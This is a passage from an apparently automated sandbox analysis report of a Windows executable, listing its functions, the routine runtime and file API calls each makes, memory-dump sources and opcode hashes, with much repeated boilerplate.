                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E931BD
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID: 1
                                                              • API String ID: 697777088-1475023258
                                                              • Opcode ID: b5fa85e0c30136bb18259340a02d9caa53343a3af64d7fcedc413d566bd7869c
                                                              • Instruction ID: 82bee11bc3ca2894610928c6241cee8157b8a819106013f58e70bb8ceda3ae6f
                                                              • Opcode Fuzzy Hash: b5fa85e0c30136bb18259340a02d9caa53343a3af64d7fcedc413d566bd7869c
                                                              • Instruction Fuzzy Hash: 3CA002D51991467D390452A19D46C77017CC4C4B51370652AB401A519559502D495031
                                                              Function 00E93289 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E931BD
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID: 1
                                                              • API String ID: 697777088-1475023258
                                                              • Opcode ID: 8b0475a662c6ecefc9ceda36ccdd88c9b562e624f57dc84b4fd3ffeed8344cbd
                                                              • Instruction ID: 82bee11bc3ca2894610928c6241cee8157b8a819106013f58e70bb8ceda3ae6f
                                                              • Opcode Fuzzy Hash: 8b0475a662c6ecefc9ceda36ccdd88c9b562e624f57dc84b4fd3ffeed8344cbd
                                                              • Instruction Fuzzy Hash: 3CA002D51991467D390452A19D46C77017CC4C4B51370652AB401A519559502D495031
                                                              Function 00E9329D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E931BD
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID: 1
                                                              • API String ID: 697777088-1475023258
                                                              • Opcode ID: 90e2d56b8984a9d8d3f4334c7778b16b2a74efdeeec5169f6e46471186f34e0c
                                                              • Instruction ID: 82bee11bc3ca2894610928c6241cee8157b8a819106013f58e70bb8ceda3ae6f
                                                              • Opcode Fuzzy Hash: 90e2d56b8984a9d8d3f4334c7778b16b2a74efdeeec5169f6e46471186f34e0c
                                                              • Instruction Fuzzy Hash: 3CA002D51991467D390452A19D46C77017CC4C4B51370652AB401A519559502D495031
                                                              Function 00E93293 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E931BD
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID: 1
                                                              • API String ID: 697777088-1475023258
                                                              • Opcode ID: 5fb89e85ea7afd76ac10b6a74180202f0d97069969c0453449373ca9076e016b
                                                              • Instruction ID: 82bee11bc3ca2894610928c6241cee8157b8a819106013f58e70bb8ceda3ae6f
                                                              • Opcode Fuzzy Hash: 5fb89e85ea7afd76ac10b6a74180202f0d97069969c0453449373ca9076e016b
                                                              • Instruction Fuzzy Hash: 3CA002D51991467D390452A19D46C77017CC4C4B51370652AB401A519559502D495031
                                                              Function 00E9326B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E931BD
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID: 1
                                                              • API String ID: 697777088-1475023258
                                                              • Opcode ID: 35fa323e24b5abeee3f682d7bb6cdae65ad9e87e21f344661d3b7f5f4b498fd4
                                                              • Instruction ID: 82bee11bc3ca2894610928c6241cee8157b8a819106013f58e70bb8ceda3ae6f
                                                              • Opcode Fuzzy Hash: 35fa323e24b5abeee3f682d7bb6cdae65ad9e87e21f344661d3b7f5f4b498fd4
                                                              • Instruction Fuzzy Hash: 3CA002D51991467D390452A19D46C77017CC4C4B51370652AB401A519559502D495031
                                                              Function 00E9327F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E931BD
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID: 1
                                                              • API String ID: 697777088-1475023258
                                                              • Opcode ID: 92ae02b451adb307f151936a6e388708dd3048156357ec1909ebda078bb3fd8e
                                                              • Instruction ID: 82bee11bc3ca2894610928c6241cee8157b8a819106013f58e70bb8ceda3ae6f
                                                              • Opcode Fuzzy Hash: 92ae02b451adb307f151936a6e388708dd3048156357ec1909ebda078bb3fd8e
                                                              • Instruction Fuzzy Hash: 3CA002D51991467D390452A19D46C77017CC4C4B51370652AB401A519559502D495031
                                                              Function 00E93275 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E931BD
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID: 1
                                                              • API String ID: 697777088-1475023258
                                                              • Opcode ID: d98e7a96bbd9aafa89e87e9cbbe6fdaa9b76dd742f48c4286971fd200ef10084
                                                              • Instruction ID: 82bee11bc3ca2894610928c6241cee8157b8a819106013f58e70bb8ceda3ae6f
                                                              • Opcode Fuzzy Hash: d98e7a96bbd9aafa89e87e9cbbe6fdaa9b76dd742f48c4286971fd200ef10084
                                                              • Instruction Fuzzy Hash: 3CA002D51991467D390452A19D46C77017CC4C4B51370652AB401A519559502D495031
                                                              Function 00E93239 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E931BD
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID: 1
                                                              • API String ID: 697777088-1475023258
                                                              • Opcode ID: a6666684923b1211b161ed7e1ab96010ed02490b137ef3f15dde545a9482428f
                                                              • Instruction ID: 82bee11bc3ca2894610928c6241cee8157b8a819106013f58e70bb8ceda3ae6f
                                                              • Opcode Fuzzy Hash: a6666684923b1211b161ed7e1ab96010ed02490b137ef3f15dde545a9482428f
                                                              • Instruction Fuzzy Hash: 3CA002D51991467D390452A19D46C77017CC4C4B51370652AB401A519559502D495031
                                                              Function 00EA0570 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00EA013B: GetOEMCP.KERNEL32(00000000,?,?,00EA03C4,?), ref: 00EA0166
                                                              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00EA0409,?,00000000), ref: 00EA05E4
                                                              • GetCPInfo.KERNEL32(00000000,00EA0409,?,?,?,00EA0409,?,00000000), ref: 00EA05F7
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CodeInfoPageValid
                                                              • String ID:
                                                              • API String ID: 546120528-0
                                                              • Opcode ID: a0cb2462bca48b4e26f4eeca77f23418ae282ca3c11bb0a84899827620be6971
                                                              • Instruction ID: 0f5ca2553077eb8fe9065a3cafd82f8655311ddfa375538c7d42c144fc7b5319
                                                              • Opcode Fuzzy Hash: a0cb2462bca48b4e26f4eeca77f23418ae282ca3c11bb0a84899827620be6971
                                                              • Instruction Fuzzy Hash: A65187B09002059FDB209F31C8916FBBBE5EFCA318F14506FE086AF951D635B946CB81
                                                              Function 00E81F7C Relevance: 3.1, APIs: 2, Instructions: 116COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetFilePointer.KERNEL32(000000FF,?,?,?), ref: 00E820B3
                                                              • GetLastError.KERNEL32 ref: 00E820BE
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorFileLastPointer
                                                              • String ID:
                                                              • API String ID: 2976181284-0
                                                              • Opcode ID: 0592b2d98f71e7c01324b22c80141362625c88f8f7b180faf65dcc7864a0b496
                                                              • Instruction ID: e5ddda9c66959f9f348f6f647df1b8a3e2d0f7d703f677947abb5e4fe9b1cb92
                                                              • Opcode Fuzzy Hash: 0592b2d98f71e7c01324b22c80141362625c88f8f7b180faf65dcc7864a0b496
                                                              • Instruction Fuzzy Hash: 6141D2306043018FDB24EF25C64456AB7E6FF98314F14992DEA8EA32A0D770EC49DB91
                                                              Function 00E822A2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FlushFileBuffers.KERNEL32(?), ref: 00E822BC
                                                              • SetFileTime.KERNEL32(?,?,?,?), ref: 00E82370
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$BuffersFlushTime
                                                              • String ID:
                                                              • API String ID: 1392018926-0
                                                              • Opcode ID: 2e314e624bd0ea3d012689a7822968afb7dc8fa6e18c5b64719ed9cdfe92d2c7
                                                              • Instruction ID: a55ea81964db2dc2f78f9612e9372a252e96e7c800db26379e192ad57a840d9c
                                                              • Opcode Fuzzy Hash: 2e314e624bd0ea3d012689a7822968afb7dc8fa6e18c5b64719ed9cdfe92d2c7
                                                              • Instruction Fuzzy Hash: BB214331248246AFC314EF74C891AABBBE8AF56308F08590DF4CD97151D338E90DD761
                                                              Function 00E81BBE Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?), ref: 00E81C36
                                                              • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800), ref: 00E81C66
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: da2efe123d42e26c7bf509d32ab8fec039f52f13a9482e9fd741772b844ba797
                                                              • Instruction ID: 681051ff481a8b67f1dab92baca6cd40975a6512e51d65acb2b82bb795a6ba82
                                                              • Opcode Fuzzy Hash: da2efe123d42e26c7bf509d32ab8fec039f52f13a9482e9fd741772b844ba797
                                                              • Instruction Fuzzy Hash: 47210071044744AFE330AA65CC88BE7B2ECEB49764F401A19F9DEE21C1C774A8858731
                                                              Function 00E9F087 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _free.LIBCMT ref: 00E9F0A8
                                                                • Part of subcall function 00E9DA90: RtlAllocateHeap.NTDLL(00000000,?,?,?,00E98B1E,?,0000015D,?,?,?,?,00E99FFA,000000FF,00000000,?,?), ref: 00E9DAC2
                                                              • HeapReAlloc.KERNEL32(00000000,?,?,00000004,00000000,?,00EA0987,?,00000004,00000000,?,?,?,00E9D066,?,00000000), ref: 00E9F0E4
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Heap$AllocAllocate_free
                                                              • String ID:
                                                              • API String ID: 2447670028-0
                                                              • Opcode ID: 58c35eb7652995ef1dcf34111037b5ff6175ee8682f9e029112ba8ca7a290458
                                                              • Instruction ID: ad6a9a9791dd0cc39b28752f2a5af0712e928dd653d1716e67cbec9b063ae236
                                                              • Opcode Fuzzy Hash: 58c35eb7652995ef1dcf34111037b5ff6175ee8682f9e029112ba8ca7a290458
                                                              • Instruction Fuzzy Hash: B8F09032605225AACF317A36AC05BAB379C9F817B5B256136FC18FB193EE60DD1091A1
                                                              Function 00E81B70 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 30COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CloseHandle.KERNEL32(000000FF,?,?,00E81B28,?,?,?,?,?,00EA700F,000000FF), ref: 00E81B8B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID: D+
                                                              • API String ID: 2962429428-1750190960
                                                              • Opcode ID: 11588aef9ee328d02f13e778ebaafc13aa9a977566dfa3253599aa4a4d3348f5
                                                              • Instruction ID: 35c75396089da9d89ecf77bf86910250e4a189d0562596d7298caee6b00a8c42
                                                              • Opcode Fuzzy Hash: 11588aef9ee328d02f13e778ebaafc13aa9a977566dfa3253599aa4a4d3348f5
                                                              • Instruction Fuzzy Hash: DAF0E970481701CFDB309B30C888792B3ECAB12329F042B9ED0EE629E0F361694F8700
                                                              Function 00E8294B Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetFileAttributesW.KERNEL32(?,00000000,?,?,00E82783,?,?), ref: 00E8295F
                                                                • Part of subcall function 00E83553: _wcslen.LIBCMT ref: 00E83577
                                                              • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,?,00E82783,?,?), ref: 00E82990
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
